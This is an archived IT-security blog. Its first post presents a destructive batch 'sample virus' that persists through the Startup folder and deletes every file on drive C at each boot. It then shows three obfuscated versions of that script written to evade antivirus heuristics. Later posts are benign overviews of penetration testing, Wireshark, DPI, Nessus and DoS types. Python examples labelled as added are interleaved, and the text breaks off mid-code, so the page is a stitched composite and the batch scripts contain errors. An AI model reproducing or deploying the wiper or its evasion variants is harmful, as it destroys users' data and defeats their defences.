Techie Blogger


Welcome To All My Visitors

Dear Visitor,

This blog is designed to reflect all my IT security experience and management skills in all their fields. I share it with everybody, and I will try to share all my knowledge with you in the best way I can, to give you the best benefit.

I will also share with you all the security articles that I like, so that you benefit from them too.

If you are looking for:

  • Security Basics, Security Solutions, Security hotfix info, Security Advices, Ethical Hacking, Pen-Test, Certifications, Work & Job Skills, Proposal Writing, Security Info, Management Skills, Short Online Training, ArcSight Knowledge Base

then you are in the right blog.

Please use the blog categories to browse my posts; they will help you reach the information you need quickly.

Also, don't forget to send me your feedback about the blog; this will give me the chance to enhance it.

PS: To follow all the new posts that I add in the near future, just register as a follower or subscribe by e-mail.


Good luck and regards,
Ramy Al Damaty

Riyadh, Saudi Arabia (GMT +3)

Wednesday, July 14, 2010

Types of Viruses, How to hide a Script from the AntiVirus

A virus or a worm is a malicious application that, once executed, harms the operating system or the data on the system. Execution may happen automatically when an infected file is accessed, or on a trigger condition such as a date or access to a directory. Since worms are a kind of virus, the term virus is generally used for both worms and viruses. So wherever this article does not state otherwise, virus means both worms and viruses.



Characteristic of viruses

Reside in the RAM

• Some viruses stay resident in RAM in order to monitor system activity and react to it, or to continue harming the system.

Leave the memory immediately after execution

• Another group of viruses leaves memory immediately after execution; this leaves the least trace of them, especially if they also remove their source files.

Change their code and characteristics

• Some viruses can alter their code as they spread, or change the way they infect other files. A few viruses are even able to generate new viruses.


Worms vs. Viruses


• A virus spreads to another PC only when an infected file is transferred to it, whereas a worm spreads by itself. In other words, a virus only infects files, and it reaches another system only once an infected file is copied there and executed. A worm, by contrast, distributes itself by methods such as placing an Autorun.inf in shared folders or exploiting vulnerabilities in applications and the operating system.

• Consequently, the distribution methods of viruses are much more limited than those of worms.

Note that nowadays most malicious applications use the distribution methods of both viruses and worms.


Types of Viruses

Stealth Viruses

• Once such a virus is activated, it infects files but does not add itself to them. Instead it stores its code elsewhere on the disk (even on another partition) and, since it controls the system, redirects requests for the file to its own code. This sort of virus mostly works together with rootkits: since a rootkit can hide any program, stealth viruses use one to hide themselves. This also lets the virus intercept the antivirus's activity, and whenever the antivirus requests the infected data, the stealth virus alters or corrupts what is returned, so it avoids detection.

Polymorphic Viruses

• While infecting a file, these viruses alter the code they add to it, so each infection adds a different version of the virus. The alteration may be a rewrite into new code with the same behaviour, or an entirely new virus in a new form.

Cavity Viruses (Space Filler)

• These viruses append themselves to the file and modify its header, so the file size appears unchanged even though extra code has been added. The modified header makes the operating system execute the virus first and start the original program afterwards.

Camouflage Viruses

• This method of hiding is really a simple trick. The virus presents itself as a harmless or even beneficial program (such as an antivirus), but after execution it carries out its malicious activity. The method is very similar to that of Trojans.

Shell Viruses

• These viruses present themselves as the main application, and the victim file becomes a subroutine of the virus. They are so named because the virus wraps the victim file like an eggshell.

Add-on Viruses

• Most viruses are of this type. They add themselves to the start of the file; when the file is executed the virus runs first and, when it finishes, the original application starts. Note that this sort of virus does not alter the header of the file.

Intrusive Viruses

• These are the most aggressive viruses. They completely or partially remove the victim file and overwrite themselves in its place. In most cases the program no longer functions properly after infection.

Companion Viruses

• They abuse the rule in Microsoft Windows that when two files have the same name but one has the .exe extension and the other .com, typing the name without an extension executes the .com file. Exploiting this, the virus copies itself with the same name as an existing executable but with the .com extension.

File Extension Viruses

• By default, Microsoft Windows does not show known file extensions such as .exe or .bat. Exploiting this, the virus hides its executable extension (.com or .exe) behind a fake, harmless-looking one such as .txt, for instance: Bad.txt.exe
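The companion and double-extension tricks just described can be checked for on a file listing. The following is an added example, not code from the original post; it scans a constructed list of names (scan_directory points it at a real folder) and reports companion .com/.exe pairs and decoy double extensions.

```python
"""
Added example: flag companion files (foo.com beside foo.exe) and deceptive
double extensions (Bad.txt.exe) in a directory listing. The sample listing
below is constructed so the script runs offline.
"""
import os
from pathlib import Path

# Extensions Windows treats as directly executable. On a default install the
# PATHEXT search order puts .COM before .EXE, the rule companion viruses abuse.
EXECUTABLE_EXTS = {".com", ".exe", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js"}
# Innocuous-looking extensions commonly used as the "fake" middle extension.
DECOY_EXTS = {".txt", ".doc", ".pdf", ".jpg", ".jpeg", ".png", ".gif", ".mp3", ".zip"}


def find_companions(names):
    """Return (com_name, exe_name) pairs that share a base name, case-insensitively."""
    by_base = {}
    for name in names:
        base, ext = os.path.splitext(name)
        by_base.setdefault(base.lower(), {})[ext.lower()] = name
    pairs = []
    for exts in by_base.values():
        if ".com" in exts and ".exe" in exts:
            pairs.append((exts[".com"], exts[".exe"]))
    return sorted(pairs)


def find_double_extensions(names):
    """Return names whose visible extension is a decoy but whose real one is executable."""
    hits = []
    for name in names:
        suffixes = [s.lower() for s in Path(name).suffixes]
        if len(suffixes) >= 2 and suffixes[-1] in EXECUTABLE_EXTS and suffixes[-2] in DECOY_EXTS:
            hits.append(name)
    return sorted(hits)


def scan_names(names):
    """Run both checks over an iterable of file names."""
    return {
        "companions": find_companions(names),
        "double_extensions": find_double_extensions(names),
    }


def scan_directory(path):
    """Run both checks over the entries of a real directory."""
    return scan_names(os.listdir(path))


# Constructed sample listing (not from a real system).
SAMPLE = [
    "notepad.exe", "notepad.com", "Bad.txt.exe", "report.pdf",
    "setup.exe", "holiday.jpg.scr", "readme.txt",
]

if __name__ == "__main__":
    for finding, items in scan_names(SAMPLE).items():
        print(finding, items)
```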

Self Modification

This section describes the methods viruses use to modify themselves in order to hide from antivirus detection, or to survive longer.

Encryption by XOR

• In this method, the virus has two segments: the encoder segment and the encoded data. The encoded part is the main body of the virus and performs the harmful actions. The task of the encoder segment is to decode the encoded data on each execution and to re-encode it on each infection. The encoder does this by XORing the data with a variable key and storing that key inside the newly generated copy of the virus.

Polymorphic Code

• These viruses alter their code by disordering its sequence; using GOTO statements or variables are the most common methods. Another method is to carry several different virus bodies inside them and, on each infection, use one of them as the main, functional virus.

Metamorphic Viruses

• These are the most complicated viruses. This kind of virus is able to alter its own code: on each execution, it reprograms itself.

How a script hides from the Antivirus Heuristic

If a signature for the virus has been produced, the antivirus will easily detect and eliminate it. But if the virus has not yet been detected and therefore has no signature (the zero-day period), the antivirus has to estimate whether the file is a virus or not. The method antivirus products use for this estimation is called heuristics, and it is roughly 70% to 80% accurate.

Conversely, viruses use several methods to hide from this technology; one of them is described below.

First we create a sample virus:

@echo off
Copy 0% C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.bat
C:
Cd\
Del *.* /f /q /s

Alright, the virus is ready!

It copies itself into the system's Startup folder and deletes all the files in all the subdirectories of drive C, and it does this on every restart. It is not a very realistic virus script, but don't play with the code on a real system!

In the first method, we alter the code using GOTO statements:

@echo off
Goto A
:E
Cd\
Goto B
:A
Copy 0% C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.bat
Goto C
:B
Del *.* /f /q /s
Exit /B
Goto D
:B
C:
Goto E

This method disturbs the sequence of the commands, so the script differs from what the heuristic engine has in its malicious-pattern database.

The next method is to use variables for altering the code:

@Echo off
Set ypy=Copy
Set sk=Menu\Programs\Startup\a.bat
Set ls=0%
Set myj=%myj%
%ypy% %ls% %sk% Menu\Programs\Startup\a.bat
set ls=C:
%ls%
Set ypy=Cd\
%ypy%
Set re=voxdi
Set re=/s
Set ypy=Del
Set sk=sjvprduwtkmw
Set sk=/f
Set ls=wrvyecx
Set ls=*.*
Set myj=/q
%ypy% %ls% %sk% %myj% %re%

Again, this method changes the sequence of the code and alters how the commands look.

Now, if we combine the above two methods, the result will be much more complicated:

@echo off
set vf=Goto
set vc=A
%vf% %vc%
:E%%
set ik=Cd\
%ik%
Set vc=B
%vf% %vc%
:A%%
Set vc=wuju
Set vc=Copy
rem xfolwhuuuiqwd
Set rd=Users\Start
Set uhq=and
Set uq=Settings\All
Set ik=0%
Set rq=C:\Documents
%vc% %ik% %rq%%pvk% %uhq% %uq% %rd%%rg% Menu\Programs\Startup\a.bat
rem kshxnmudlnigqs
Set vc=C
%vf% %vc%
:B%%
Set ik=*.*
Set vc=qisjgf
Set vc=Del
Set uq=/s
Set rd=%rq%
Set rq=/f
Set uhq=/q
%vc% %ik% %rq% %uhq% %uq%
Set ik=/B
rem vfmcodgyevnutol
Set vc=Exit
%vc% %ik%
rem lrpcttoclg
Set vc=D
%vf% %vc%
:B%%
Set vc=C:
%vc%
Set vc=E
%vf% %vc%



Note that these scripts are only samples and may not work properly; however, it is strongly recommended to perform any test or execution only in a laboratory or test environment, and to avoid running them on your own systems.
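The GOTO and variable-substitution tricks above are what an analyst has to undo when triaging a suspicious batch file. The following is an added example, not code from the original post: a normaliser that statically walks a script, applies the %var% expansions cmd.exe would apply, follows GOTO jumps, drops REM lines and returns the concrete commands in execution order, so the obfuscated form can be compared with the plain one. It assumes the trailing % characters on the post's labels (:A%%) are decoration and only parses the script text, never running it.

```python
"""
Added example: recover the effective command sequence of a batch script that
hides behind SET/%var% substitution and GOTO reordering. The sample script is
the variable-substitution script from the post, embedded as text; it is only
parsed here, never executed.
"""


def expand(line, env, args):
    """Expand %var%, %% and %0-%9 the way cmd.exe does inside a batch file:
    undefined variables become empty and a lone '%' is dropped."""
    out, i, n = [], 0, len(line)
    while i < n:
        c = line[i]
        if c != "%":
            out.append(c)
            i += 1
            continue
        if i + 1 < n and line[i + 1] == "%":      # '%%' -> literal '%'
            out.append("%")
            i += 2
            continue
        if i + 1 < n and line[i + 1].isdigit():   # '%0'..'%9' -> batch argument
            out.append(args.get(line[i + 1], ""))
            i += 2
            continue
        j = line.find("%", i + 1)
        if j == -1:                                # unmatched '%' is discarded
            i += 1
            continue
        out.append(env.get(line[i + 1:j].lower(), ""))
        i = j + 1
    return "".join(out)


def normalize_batch(script, args=None, max_steps=10000):
    """Return the list of concrete commands the script would run, in order."""
    args = args or {"0": "<script>"}   # %0 is the script path; placeholder here
    lines = [ln.strip() for ln in script.splitlines()]
    # Label table. Assumption: the post's ':A%%' labels are 'A' with decoration,
    # so trailing '%' characters are stripped to let 'goto A' resolve.
    labels = {}
    for idx, ln in enumerate(lines):
        if ln.startswith(":") and ln[1:].split():
            labels.setdefault(ln[1:].split()[0].rstrip("%").lower(), idx)
    env, commands, pc, steps = {}, [], 0, 0
    while pc < len(lines) and steps < max_steps:   # step cap guards GOTO loops
        steps += 1
        raw = lines[pc]
        pc += 1
        if not raw or raw.startswith(":") or raw.lower() == "rem" or raw.lower().startswith("rem "):
            continue                                # labels and comments run nothing
        cmd = expand(raw, env, args).lstrip("@")   # '@' only suppresses echo
        low = cmd.lower()
        if low.startswith("set ") and "=" in cmd:
            name, _, value = cmd[4:].partition("=")
            name = name.strip().lower()
            if value:
                env[name] = value
            else:                                   # 'set x=' deletes the variable
                env.pop(name, None)
            continue
        if low.startswith("goto "):
            target = cmd[5:].strip().lstrip(":").lower()
            if target == "eof":
                break
            if target not in labels:                # cmd aborts on an unknown label
                commands.append("<goto %s: label not found, cmd would abort>" % target)
                break
            pc = labels[target] + 1
            continue
        commands.append(cmd)
        if low.startswith("exit"):
            break
    return commands


# Constructed sample text: the variable-substitution script from the post.
VARIABLE_SAMPLE = r"""
@Echo off
Set ypy=Copy
Set sk=Menu\Programs\Startup\a.bat
Set ls=0%
Set myj=%myj%
%ypy% %ls% %sk% Menu\Programs\Startup\a.bat
set ls=C:
%ls%
Set ypy=Cd\
%ypy%
Set re=voxdi
Set re=/s
Set ypy=Del
Set sk=sjvprduwtkmw
Set sk=/f
Set ls=wrvyecx
Set ls=*.*
Set myj=/q
%ypy% %ls% %sk% %myj% %re%
"""

if __name__ == "__main__":
    for command in normalize_batch(VARIABLE_SAMPLE):
        print(command)
```

The recovered sequence shows the post's own typo faithfully (0% collapses to 0, as cmd would do), which is exactly the kind of detail a normaliser should preserve rather than repair.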

Penetration Testing Guide - All What You Need To Know

Introduction



Penetration testing is an often confused term. Through this guide Corsaire, a world leader in information security, provides a broad overview of what it means, why you would want it, and how to get the most out of the process.

• What is a penetration test?

• Why conduct penetration testing?

• What can be tested?

• What should be tested?

• What do you get for the money?

• What to do to ensure the project is a success



What is a penetration test?

Much of the confusion surrounding penetration testing stems from the fact it is a relatively recent and rapidly evolving field. Additionally, many organisations will have their own internal terminology (one man's penetration test is another's vulnerability audit or technical risk assessment).


At its simplest, a penetration-test (actually, we prefer the term security assessment) is the process of actively evaluating your information security measures. Note the emphasis on 'active' assessment; the information systems will be tested to find any security issues, as opposed to a solely theoretical or paper-based audit.


The results of the assessment will then be documented in a report, which should be presented at a debriefing session, where questions can be answered and corrective strategies can be freely discussed.




Why conduct a penetration test?

From a business perspective, penetration testing helps safeguard your organisation against failure, through:

• Preventing financial loss through fraud (hackers, extortionists and disgruntled employees) or through lost revenue due to unreliable business systems and processes.

• Proving due diligence and compliance to your industry regulators, customers and shareholders. Non-compliance can result in your organisation losing business, receiving heavy fines, gathering bad PR or ultimately failing. At a personal level it can also mean the loss of your job, prosecution and sometimes even imprisonment.

• Protecting your brand by avoiding loss of consumer confidence and business reputation.

From an operational perspective, penetration testing helps shape information security strategy through:

• Identifying vulnerabilities and quantifying their impact and likelihood so that they can be managed proactively; budget can be allocated and corrective measures implemented.




What can be tested?

All parts of the way that your organisation captures, stores and processes information can be assessed; the systems that the information is stored in, the transmission channels that transport it, and the processes and personnel that manage it. Examples of areas that are commonly tested are:

• Off-the-shelf products (operating systems, applications, databases, networking equipment etc.)

• Bespoke development (dynamic web sites, in-house applications etc.)

• Telephony (war-dialling, remote access etc.)

• Wireless (WIFI, Bluetooth, IR, GSM, RFID etc.)

• Personnel (screening process, social engineering etc.)

• Physical (access controls, dumpster diving etc.)




What should be tested?

Ideally, your organisation should have already conducted a risk assessment, so will be aware of the main threats (such as communications failure, e-commerce failure, loss of confidential information etc.), and can now use a security assessment to identify any vulnerabilities that are related to these threats. If you haven't conducted a risk assessment, then it is common to start with the areas of greatest exposure, such as the public facing systems; web sites, email gateways, remote access platforms etc.

Sometimes the 'what' of the process may be dictated by the standards that your organisation is required to comply with. For example, a credit-card handling standard (like PCI) may require that all the components that store or process card-holder data are assessed.




What do you get for the money?

While a great deal of technical effort is applied during the testing and analysis, the real value of a penetration test is in the report and debriefing that you receive at the end. If they are not clear and easy to understand, then the whole exercise is of little worth.

Ideally the report and debriefing should be broken into sections that are specifically targeted at their intended audience. Executives need the business risks and possible solutions clearly described in layman's terms, managers need a broad overview of the situation without getting lost in detail, and technical personnel need a list of vulnerabilities to address, with recommended solutions.




What to do to ensure the project is a success

Defining the scope

The scope should be clearly defined, not only in the context of the components to be (or not to be) assessed and the constraints under which testing should be conducted, but also the business and technical objectives. For example penetration testing may be focussed purely on a single application on a single server, or may be more far reaching; including all hosts attached to a particular network.




Choosing a security partner

Another critical step to ensure that your project is a success is in choosing which supplier to use.

As an absolute fundamental when choosing a security partner, first eliminate the supplier who provided the systems that will be tested. Using them creates a conflict of interest (will they really tell you that they deployed the systems insecurely, or will they quietly ignore some issues?).

Detailed below are some questions that you might want to ask your potential security partner:

• Is security assessment their core business?

• How long have they been providing security assessment services?

• Do they offer a range of services that can be tailored to your specific needs?

• Are they vendor independent (do they have NDAs with vendors that prevent them passing information to you)?

• Do they perform their own research, or are they dependent on out-of-date information that is placed in the public domain by others?

• What are their consultant's credentials?

• How experienced are the proposed testing team (how long have they been testing, and what is their background and age)?

• Do they hold professional certifications, such as PCI, CISSP, CISA, and CHECK?

• Are they recognised contributors within the security industry (white papers, advisories, public speakers etc)?

• Are the CVs available for the team that will be working on your project?

• How would the supplier approach the project?

• Do they have a standardised methodology that meets and exceeds the common ones, such as OSSTMM, CHECK and OWASP?

• Can you get access to a sample report to assess the output (is it something you could give to your executives; do they communicate the business issues in a non-technical manner)?

• What is their policy on confidentiality?

• Do they outsource or use contractors?

• Are references available from satisfied customers in the same industry sector?

• Is there a legal agreement that will protect you from negligence on behalf of the supplier?

• Does the supplier maintain sufficient insurance cover to protect your organisation?




Standards compliance

There are a number of good standards and guidelines in relation to information security in general, for penetration tests in particular, and for the storage of certain types of data. Any provider chosen should at least have a working knowledge of these standards and would ideally be exceeding their recommendations.

Notable organisations and standards include:



PCI

The Payment Card Industry (PCI) Data Security Requirements were established in December 2004, and apply to all Members, merchants, and service providers that store, process or transmit cardholder data. As well as a requirement to comply with this standard, there is a requirement to independently prove verification.



ISACA

ISACA was established in 1967 and has become a pace-setting global organization for information governance, control, security and audit professionals. Its IS Auditing and IS Control standards are followed by practitioners worldwide and its research pinpoints professional issues challenging its constituents. CISA, the Certified Information Systems Auditor is ISACA's cornerstone certification. Since 1978, the CISA exam has measured excellence in the area of IS auditing, control and security and has grown to be globally recognized and adopted worldwide as a symbol of achievement.




CHECK

The CESG IT Health Check scheme was instigated to ensure that sensitive government networks and those constituting the GSI (Government Secure Intranet) and CNI (Critical National Infrastructure) were secured and tested to a consistent high level. The methodology aims to identify known vulnerabilities in IT systems and networks which may compromise the confidentiality, integrity or availability of information held on that IT system. In the absence of other standards, CHECK has become the de-facto standard for penetration testing in the UK, mainly on account of its rigorous certification process. While good, it concentrates only on infrastructure testing, not applications. However, open source methodologies such as the following are providing viable and comprehensive alternatives, without UK Government association. It must also be noted that CHECK consultants are only required when the assessment is for HMG or related parties and meets the requirements above. If you want a CHECK test you will need to surrender your penetration testing results to CESG.




OSSTMM

The aim of The Open Source Security Testing Methodology Manual (OSSTMM) is to set forth a standard for Internet security testing. It is intended to form a comprehensive baseline for testing that, if followed, ensures a thorough and comprehensive penetration test has been undertaken. This should enable a client to be certain of the level of technical assessment independently of other organisation concerns, such as the corporate profile of the penetration-testing provider.




OWASP

The Open Web Application Security Project (OWASP) is an Open Source community project developing software tools and knowledge based documentation that helps people secure web applications and web services. It is an open source reference point for system architects, developers, vendors, consumers and security professionals involved in designing, developing, deploying and testing the security of web applications and Web Services.



The key areas of relevance are the forthcoming Guide to Testing Security of Web Applications and Web Services and the testing tools under the development projects. The Guide to Building Secure Web Applications not only covers design principles, but is also a useful document for setting out criteria by which to assess vendors and test systems.

Tuesday, July 13, 2010

Review a checklist of analysis tasks


Analysis tasks can be considered preventive or reactive. Preventive methods include base-lining network communications to learn the current status of the network and application performance. Preventive analysis can also be used to spot network problems before they are felt by the network users. For example, identifying the cause of packet loss before it becomes excessive and affects network communications helps avoid problems before they are even noticed.



Reactive analysis techniques are employed after a complaint about network performance has been reported or when network problems are suspected. Sadly, reactive analysis is more common.




The following are some of the analysis tasks that can be performed using Wireshark:

• Find the top talkers on the network.

• Identify the protocols and applications in use.

• Determine the average packets per second rate and bytes per second rate of an application or all network traffic on a link.

• List all hosts communicating.

• Learn the packet lengths used by a data transfer application.

• Recognize the most common connection problems.

• Spot delays between client requests due to slow processing.

• Locate misconfigured hosts.

• Detect network or host congestion that is slowing down file transfers.

• Identify asynchronous traffic prioritization.

• Graph HTTP flows to examine website referral rates.

• Identify unusual scanning traffic on the network.

• Quickly identify HTTP error responses indicating client and server problems.

• Quickly identify VoIP error responses indicating client, server or global errors.

• Build graphs to compare traffic behavior.

• Graph application throughput and compare with overall link traffic seen.

• Identify applications that do not encrypt traffic.

• Play back VoIP conversations to hear the effects of various network problems on network traffic.

• Perform passive operating system and application use detection.

• Spot unusual protocols and unrecognized port number usage on the network.

• Examine the start-up process of hosts and applications on the network.

• Identify average and unacceptable service response times (SRT).

• Graph intervals of periodic packet generation applications or protocols.

Networks vary greatly in the traffic they see. The number and type of network analysis tasks you can perform depends on your network traffic characteristics.

Port Mirroring

Port mirroring, also known as a roving analysis port, is a method of monitoring network traffic that forwards a copy of each incoming and outgoing packet from one port of a network switch to another port where the packet can be studied. A network administrator uses port mirroring as a diagnostic tool or debugging feature, especially when fending off an attack. It enables the administrator to keep close track of switch performance and alter it if necessary. Port mirroring can be managed locally or remotely.




An administrator configures port mirroring by assigning a port from which to copy all packets and another port where those packets will be sent. A packet bound for or heading away from the first port will be forwarded onto the second port as well. The administrator places a protocol analyzer on the port receiving the mirrored data to monitor each segment separately. The analyzer captures and evaluates the data without affecting the client on the original port.




The monitor port may be a port on the same SwitchModule with an attached RMON probe, a port on a different SwitchModule in the same hub, or the SwitchModule processor.




Port mirroring can consume significant CPU resources while active. Better choices for long-term monitoring may include a passive tap like an optical probe or an Ethernet repeater.

FCAPS

FCAPS (fault-management, configuration, accounting, performance, and security) is an acronym for a categorical model of the working objectives of network management. There are five levels, called the fault-management level (F), the configuration level (C), the accounting level (A), the performance level (P), and the security level (S).




At the F level, network problems are found and corrected. Potential future problems are identified, and steps are taken to prevent them from occurring or recurring. In this way, the network is kept operational, and downtime is minimized.




At the C level, network operation is monitored and controlled. Hardware and programming changes, including the addition of new equipment and programs, modification of existing systems, and removal of obsolete systems and programs, are coordinated. An inventory of equipment and programs is kept and updated regularly.




The A level, which might also be called the allocation level, is devoted to distributing resources optimally and fairly among network subscribers. This makes the most effective use of the systems available, minimizing the cost of operation. This level is also responsible for ensuring that users are billed appropriately.




The P level is involved with managing the overall performance of the network. Throughput is maximized, bottlenecks are avoided, and potential problems are identified. A major part of the effort is to identify which improvements will yield the greatest overall performance enhancement.




At the S level, the network is protected against hackers, unauthorized users, and physical or electronic sabotage. Confidentiality of user information is maintained where necessary or warranted. The security systems also allow network administrators to control what each individual authorized user can (and cannot) do with the system.

deep packet inspection (DPI)

Deep packet inspection (DPI) is an advanced method of packet filtering that functions at the Application layer of the OSI (Open Systems Interconnection) reference model. The use of DPI makes it possible to find, identify, classify, reroute or block packets with specific data or code payloads that conventional packet filtering, which examines only packet headers, cannot detect.




Using DPI, communications service providers can allocate available resources to streamline traffic flow. For example, a message tagged as high priority can be routed to its destination ahead of less important or low-priority messages or packets involved in casual Internet browsing. DPI can also be used for throttled data transfer to prevent P2P (peer-to-peer) abuse, improving network performance for most subscribers. The security implications of DPI are widespread because the technology makes it possible to identify the originator or recipient of content containing specific packets, a capability that has sparked concern among advocates of online privacy.



DPI has at least three significant limitations. First, it can create new vulnerabilities as well as protect against existing ones. While effective against buffer overflow attacks, denial of service attacks and certain types of malware, DPI can also be exploited to facilitate attacks in those same categories. Second, DPI adds to the complexity and unwieldy nature of existing firewalls and other security-related software. DPI requires its own periodic updates and revisions to remain optimally effective. Third, DPI can reduce computer speed because it increases the burden on the processor. Despite these limitations, many network administrators have embraced DPI technology in an attempt to cope with a perceived increase in the complexity and widespread nature of Internet-related perils.



Numerous companies, including such major players as Alcatel, Cisco, Ericsson, IBM, Microsoft, Nokia and Symantec have begun to aggressively market DPI technology as components of hardware and software firewalls.


Nessus

Nessus is an open-source network vulnerability scanner that uses the Common Vulnerabilities and Exposures architecture for easy cross-linking between compliant security tools. Nessus employs the Nessus Attack Scripting Language (NASL), a simple language that describes individual threats and potential attacks.





Nessus has a modular architecture consisting of centralized servers that conduct scanning, and remote clients that allow for administrator interaction. Administrators can include NASL descriptions of all suspected vulnerabilities to develop customized scans. Significant capabilities of Nessus include:

• Compatibility with computers and servers of all sizes.

• Detection of security holes in local or remote hosts.

• Detection of missing security updates and patches.

• Simulated attacks to pinpoint vulnerabilities.

• Execution of security tests in a contained environment.

• Scheduled security audits.




The Nessus server is currently available for Unix, Linux and FreeBSD. The client is available for Unix- or Windows-based operating systems.
Penetration testing methodology and standards

One of the crucial factors in the success of a pen-test is the underlying methodology. Lack of a formal methodology means no consistency -- and I am sure -- you don't want to be the one paying and watching the testers poking around cluelessly. While a penetration tester's skills need to be specialized for the job, the approach shouldn't be. In other words, a formal methodology should provide a disciplined framework for conducting a complete and accurate penetration test, but need not be restrictive -- it should allow the tester to fully explore his intuitions.



The Open Source Security Testing Methodology Manual (OSSTMM) by Pete Herzog has become a de-facto methodology for performing penetration testing and obtaining security metrics. According to Pete Herzog, "The primary goal of the OSSTMM is to provide transparency. It provides transparency of those who have inadequate security configurations and policies. It provides transparency of those who perform inadequate security and penetration tests. It provides transparency of the unscrupulous security vendors vying to sponge up every last cent of their prey's already meager security budget; those who would side-step business values with over-hyped threats of legal compliancy, cyber-terrorism, and hackers." The OSSTMM covers the whole process of risk assessment involved in a penetration test, from initial requirements analysis to report generation. The six areas of testing methodology covered are:

• Information security

• Process security

• Internet technology security

• Communications security

• Wireless security

• Physical security


The OSSTMM focuses on the technical details of exactly which items need to be tested, what to do before, during, and after a security test, and how to measure the results. New tests for international best practices, laws, regulations, and ethical concerns are regularly added and updated.


The National Institute of Standards and Technology (NIST) discusses penetration testing in Special Publication 800-42, Guideline on Network Security Testing. NIST's methodology is less comprehensive than the OSSTMM; however, it is more likely to be accepted by regulatory agencies.


Another area that requires attention is the penetration testing service provider. One of the biggest fears that every organization faces during a pen-test process is the chance of sensitive information being passed on to the wrong hands. Therefore, it becomes really important to gather as much information about the company (such as their technical abilities, certifications, experiences, methodology and tools employed) and make sure that you are dealing with professionals. In addition, there are several professional and government certifications that indicate the firm's trustworthiness and conformance to industry best practice.


Standards in penetration testing


Let's take a look at some of the standards and guidelines available:


Standards for Information Systems Auditing (ISACA): ISACA was established in 1967 and has become a pace-setting global organization for information governance, control, security and audit professionals. Its IS auditing and IS control standards are followed by practitioners worldwide and its research pinpoints professional issues challenging its constituents. CISA, the Certified Information Systems Auditor is ISACA's cornerstone certification.



CHECK: The CESG IT Health Check scheme was instigated to ensure that sensitive government networks and those constituting the GSI (Government Secure Intranet) and CNI (Critical National Infrastructure) were secured and tested to a consistently high level. The methodology aims to identify known vulnerabilities in IT systems and networks which may compromise the confidentiality, integrity or availability of information held on that IT system. CHECK consultants are only required when the assessment is for HMG or related parties and meets the requirements above. In the absence of other standards, CHECK became the de-facto standard for penetration testing in the UK. Companies belonging to CHECK must have employees that are security cleared and have passed the CESG Hacking Assault Course. However, open source methodologies such as the following are providing viable and comprehensive alternatives, without UK Government association.



OSSTMM: The aim of The Open Source Security Testing Methodology Manual is to set forth a standard for Internet security testing. It is intended to form a comprehensive baseline for testing that, if followed, ensures a thorough and comprehensive penetration test has been undertaken. This should enable a client to be certain of the level of technical assessment independently of other organizational concerns, such as the corporate profile of the penetration-testing provider.



OWASP: The Open Web Application Security Project (OWASP) is an open source community project developing software tools and knowledge-based documentation that helps people secure Web applications and Web services. OWASP is an open source reference point for system architects, developers, vendors, consumers and security professionals involved in designing, developing, deploying and testing the security of Web applications and Web services. In short, the Open Web Application Security Project aims to help everyone and anyone build more secure Web applications and Web services.



Conclusion



Security is a continuum, not an absolute. The value of penetration testing lies in its results -- the ones that answer the big question "WHY?" A successful penetration test indicates more than a particular flaw; it identifies the process failures that produced the vulnerability in the first place. Fixing or patching the vulnerability detected does not mean an end to your security worries or nightmares -- it is just the beginning of a never-ending cycle.



The CRUX: A penetration test does not guarantee absolute security – it's just a measurement of your security posture. So, "never have a false sense of security".


Types of penetration tests

Denial of Service (DoS) testing

Denial of service testing involves attempting to exploit specific weaknesses on a system by exhausting the target's resources so that it stops responding to legitimate requests. This testing can be performed using automated tools or manually. The different types of DoS can be broadly classified into software exploits and flooding attacks. Decisions regarding the extent of Denial of Service testing to be incorporated into a penetration testing exercise depend on the relative importance of ongoing, continued availability of the information systems and related processing activities. Denial of service can take a number of forms; those that are important to test for are listed below:



Resource overload – these attacks intend to overload the resources (i.e. memory) of a target so that it no longer responds.

Flood attacks – this involves sending a large amount of network requests with the intention of overloading the target. This can be performed via:

ICMP (Internet Control Message Protocol), known as "smurf" attacks

UDP (User Datagram Protocol), known as "fraggle" attacks



Half open SYN attack - this involves partially opening numerous TCP connections on the target, so that legitimate connections cannot be started.



Out-of-band attacks – these attempt to crash targets by breaking IP header standards:

Oversized packets (ping of death) – the packet header indicates that there is more data in the packet than there actually is.

Fragmentation (teardrop attack) – sends overlapping fragmented packets (pieces of packets) which are under length.

IP source address spoofing (land attack) – causes a computer to create a TCP connection to itself.

Malformed UDP packet header (UDP bomb) – UDP headers indicate an incorrect length.



Application security testing

With the growth of ebusiness, core business functionality is now being offered through Web-based applications. While Internet facing applications give an organization the much needed global customer reach, providing access to partners inside the intranet introduces new security vulnerabilities: even with a firewall and other monitoring systems in place, security can be compromised, because application traffic must be allowed to pass through the firewall. The objective of application security testing is to evaluate the controls over the application (electronic commerce servers, on-line financial applications, distributed applications, and Internet front ends to legacy systems) and its process flow. Topics to be evaluated may include the application's usage of encryption to protect the confidentiality and integrity of information, how users are authenticated, the integrity of the Internet user's session with the host application, and the use of cookies – a block of data stored on a customer's computer that is used by the Web server application.

Let's take a look at some important components of application testing:



Code review: Code reviews involve analysing all the application-based code to ensure that it does not contain any sensitive information that an intruder might use to exploit an application. For example: Publicly available application code may include test comments, names or clear text passwords that will give an intruder a great deal of information about the application.

Authorization testing: Involves testing the systems responsible for the initiation and maintenance of user sessions. This will require testing:

Input validation of login fields – bad characters or overlong inputs can produce unpredictable results;

Cookie security – cookies can be stolen and legitimate sessions can be used by an unauthorised individual; and

Lockout testing – testing the timeout and intrusion lockout parameters set in the application, to ensure legitimate sessions cannot be hijacked.

This is performed to discover whether the login system can be forced into permitting unauthorised access. The testing will also reveal whether the system is susceptible to denial of service attacks using the same techniques.
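The three authorization checks listed above (input validation of the login fields, cookie security and lockout parameters) as they look from the defending side, in an added example that is not part of the original article: a minimal login service that rejects overlong or malformed fields before touching credentials, locks an account after repeated failures, and issues an unguessable session token that times out. The class, function and threshold names are assumptions made for this example.

```python
import hashlib
import hmac
import re
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

MAX_FIELD_LEN = 64                               # overlong inputs are rejected outright
USERNAME_RE = re.compile(r"^[A-Za-z0-9._@-]+$")  # no quotes, spaces or control characters
MAX_FAILURES = 5                                 # failures before the account is locked
LOCKOUT_SECONDS = 15 * 60                        # intrusion lockout duration (assumed)
SESSION_TTL = 30 * 60                            # session timeout in seconds (assumed)
PBKDF2_ROUNDS = 50_000


@dataclass
class Account:
    salt: bytes
    password_hash: bytes
    failures: int = 0
    locked_until: float = 0.0


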